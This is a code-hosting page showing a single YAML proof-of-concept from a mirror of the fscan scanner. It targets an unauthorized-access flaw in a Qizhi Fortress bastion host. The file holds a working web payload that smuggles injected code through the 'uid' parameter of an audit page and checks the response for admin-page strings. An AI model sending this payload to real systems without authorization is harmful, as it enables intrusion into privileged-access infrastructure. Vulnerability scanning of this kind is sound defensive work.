qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/Web_Scan/pocs/qizhi-fortressaircraft-unau...

13 lines
517 B
YAML
Raw Blame History

name: poc-yaml-qizhi-fortressaircraft-unauthorized
rules:
- method: GET
path: >-
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
expression: |
response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计")
detail:
author: we1x4n(https://we1x4n.com/)
links:
- https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw
Reference in New Issue View Git Blame Copy Permalink